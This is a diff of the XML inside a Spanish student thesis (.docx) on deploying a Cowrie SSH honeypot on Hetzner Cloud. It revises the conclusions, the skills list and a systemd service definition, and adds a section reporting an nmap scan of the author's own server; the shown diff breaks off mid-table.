+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones sobre la Infraestructura</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Desde el punto de vista técnico, el proyecto demuestra que es posible montar una infraestructura de inteligencia de amenazas funcional con software exclusivamente libre y un coste de infraestructura muy reducido. Un servidor pequeño (2 vCPU y 4 GB de RAM) es más que suficiente para ejecutar Cowrie, el sistema operativo y los servicios auxiliares simultáneamente. El cambio forzoso de Oracle Cloud a Hetzner Cloud demostró además el valor de automatizar el despliegue con scripts genéricos: cambiar de proveedor solo afectó a la creación de la máquina.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">La combinación del firewall del proveedor (Cloud Firewall de Hetzner), el firewall del host (iptables) y la redirección NAT proporciona tres capas de protección para el SSH de administración real. El puerto 2022 está expuesto a Internet, pero al aceptar únicamente autenticación por clave y prohibir el acceso como root, los intentos de acceso no autorizados no tienen posibilidad de éxito. Esta arquitectura de defensa en profundidad es trasladable a cualquier entorno de producción.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El script Python desarrollado (cowrie_analyzer.py) automatiza el procesamiento de miles de eventos y genera artefactos visuales directamente utilizables en un informe de seguridad profesional. Su diseño modular permite ampliar el análisis con nuevas métricas sin modificar la estructura existente. El generador de datos de prueba (generate_sample_logs.py) ha permitido desarrollar y validar el script de análisis sin necesidad de esperar a la captura de datos reales, acelerando significativamente el desarrollo.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Conclusiones Formativas</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Como reflexión profesional, el proyecto ha reforzado competencias transversales del ciclo de ASIR que son directamente aplicables en el mercado laboral:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24138,15 +24263,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Seguridad de sistemas: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">hardening de SSH, configuración de firewalls (iptables y Cloud Firewall de Hetzner), gestión de claves criptográficas y aplicación de buenas prácticas de seguridad recogidas en benchmarks CIS.</w:t>
+        <w:t xml:space="preserve">Administración de sistemas Linux en entornos cloud: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">despliegue de servidores, configuración de cortafuegos del proveedor, gestión de claves SSH y conexión remota en Hetzner Cloud, además del uso de la API de Oracle Cloud Infrastructure para automatizar el aprovisionamiento.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24167,15 +24292,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Scripting y automatización: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">desarrollo de scripts Python para el procesamiento de datos JSON, generación de gráficas con matplotlib y consumo de APIs REST.</w:t>
+        <w:t xml:space="preserve">Seguridad de sistemas: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">hardening de SSH, configuración de firewalls (iptables y Cloud Firewall de Hetzner), gestión de claves criptográficas y aplicación de buenas prácticas de seguridad recogidas en benchmarks CIS.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24196,15 +24321,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Análisis de logs de seguridad: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">interpretación de eventos de seguridad, identificación de patrones de ataque y correlación de indicadores de compromiso.</w:t>
+        <w:t xml:space="preserve">Scripting y automatización: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">desarrollo de scripts Python para el procesamiento de datos JSON, generación de gráficas con matplotlib y consumo de APIs REST.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24225,15 +24350,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Inteligencia de amenazas: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">aplicación del marco MITRE ATT&amp;CK para la clasificación de comportamientos adversarios y la formulación de recomendaciones defensivas.</w:t>
+        <w:t xml:space="preserve">Análisis de logs de seguridad: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">interpretación de eventos de seguridad, identificación de patrones de ataque y correlación de indicadores de compromiso.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24254,6 +24379,35 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:t xml:space="preserve">Inteligencia de amenazas: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">aplicación del marco MITRE ATT&amp;CK para la clasificación de comportamientos adversarios y la formulación de recomendaciones defensivas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:left="720" w:hanging="357"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">Documentación técnica: </w:t>
       </w:r>
       <w:r>
@@ -27013,55 +27167,135 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve"># COWRIE_STDOUT=yes: primer plano, salida al journal (journalctl -u cowrie)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepLines/>
-        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
-        <w:spacing w:after="0" w:before="0" w:line="240"/>
-        <w:ind w:left="170" w:right="170"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Environment=COWRIE_STDOUT=yes</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepLines/>
-        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
-        <w:spacing w:after="0" w:before="0" w:line="240"/>
-        <w:ind w:left="170" w:right="170"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Environment=AUTHBIND_ENABLED=no</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:keepLines/>
-        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
-        <w:spacing w:after="0" w:before="0" w:line="240"/>
-        <w:ind w:left="170" w:right="170"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="16"/>
-          <w:szCs w:val="16"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ExecStart=/home/cowrie/honeypot/cowrie-env/bin/cowrie start</w:t>
+        <w:t xml:space="preserve"># Se lanza twistd directamente y en primer plano (-n), con la salida al</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># journal (journalctl -u cowrie). Es lo que hace "cowrie start" con</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># COWRIE_STDOUT=yes, salvo dos detalles que lo rompian bajo systemd:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">#  - "cowrie start" busca twistd en el PATH y systemd no activa el venv</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">#    (FileNotFoundError): aqui va la ruta completa.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">#  - twistd escribe twistd.pid en el directorio de trabajo, que el</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">#    confinamiento deja en solo lectura: --pidfile= lo desactiva (systemd</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">#    ya sabe el PID del proceso).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ExecStart=/home/cowrie/honeypot/cowrie-env/bin/twistd --umask=0022 -n --pidfile= --logger cowrie.python.logfile.stdoutLogger cowrie</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -32084,6 +32318,54 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
+        <w:t xml:space="preserve"># Cache de plugins de Twisted: bajo systemd el venv es de solo lectura y,</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve"># sin generarla aqui, twistd avisaria en cada arranque de que no puede escribirla.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
+        <w:t xml:space="preserve">python -c "from twisted.plugin import IPlugin, getPlugins; list(getPlugins(IPlugin))"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepLines/>
+        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
+        <w:spacing w:after="0" w:before="0" w:line="240"/>
+        <w:ind w:left="170" w:right="170"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
+          <w:sz w:val="16"/>
+          <w:szCs w:val="16"/>
+        </w:rPr>
         <w:t xml:space="preserve">EOF</w:t>
       </w:r>
     </w:p>
@@ -33563,7 +33845,7 @@
           <w:sz w:val="16"/>
           <w:szCs w:val="16"/>
         </w:rPr>
-        <w:t xml:space="preserve">  Administracion:            ssh -p 2022 ubuntu@&lt;IP_PUBLICA&gt;</w:t>
+        <w:t xml:space="preserve">  Administracion:            ssh -p 2022 ${SUDO_USER:-&lt;tu_usuario&gt;}@&lt;IP_PUBLICA&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/docs/Memoria_PIASIR_Diego_Perez_Fonterosa.docx
+++ b/docs/Memoria_PIASIR_Diego_Perez_Fonterosa.docx
@@ -13205,7 +13205,7 @@
                 <w:sz w:val="20"/>
                 <w:szCs w:val="20"/>
               </w:rPr>
-              <w:t xml:space="preserve">En curso</w:t>
+              <w:t xml:space="preserve">Completada</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -20551,7 +20551,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Las pruebas se han realizado en dos etapas. La primera, ya completada, valida en un entorno Linux local los componentes que no dependen del servidor cloud: la instalación y configuración de Cowrie, su comportamiento ante un ataque, el analizador con datos reales y las herramientas auxiliares. La segunda, pendiente de la disponibilidad de la instancia, corresponde a las pruebas de la tabla RFTP sobre el servidor desplegado. Este capítulo documenta los resultados de la primera etapa, incluida una incidencia relevante detectada durante las pruebas.</w:t>
+        <w:t xml:space="preserve">Las pruebas se han realizado en dos etapas. La primera valida en un entorno Linux local los componentes que no dependen del servidor cloud: la instalación y configuración de Cowrie, su comportamiento ante un ataque, el analizador y las herramientas auxiliares. La segunda corresponde a las pruebas de la tabla RFTP sobre el servidor desplegado en Hetzner Cloud. Este capítulo documenta ambas etapas y las incidencias detectadas en cada una.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23613,6 +23613,397 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Escaneo Externo con nmap</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360"/>
+        <w:ind w:firstLine="709"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">El 7 de octubre se escanearon desde el exterior los puertos 1 a 3000 del servidor con nmap 7.98 (nmap -Pn -sT -sV), para comprobar qué ve un atacante (R01F02T01P01):</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblW w:type="pct" w:w="5000"/>
+        <w:tblBorders>
+          <w:top w:val="single" w:color="auto" w:sz="4"/>
+          <w:left w:val="single" w:color="auto" w:sz="4"/>
+          <w:bottom w:val="single" w:color="auto" w:sz="4"/>
+          <w:right w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideH w:val="single" w:color="auto" w:sz="4"/>
+          <w:insideV w:val="single" w:color="auto" w:sz="4"/>
+        </w:tblBorders>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="1588"/>
+        <w:gridCol w:w="2381"/>
+        <w:gridCol w:w="3969"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:tblHeader/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Puerto</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1500"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Estado</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2500"/>
+            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b/>
+                <w:bCs/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Servicio identificado por nmap</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">22/tcp</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1500"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Abierto</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2500"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">OpenSSH 9.2p1 Debian 2+deb12u5 (Cowrie)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">2022/tcp</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1500"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Abierto</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2500"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
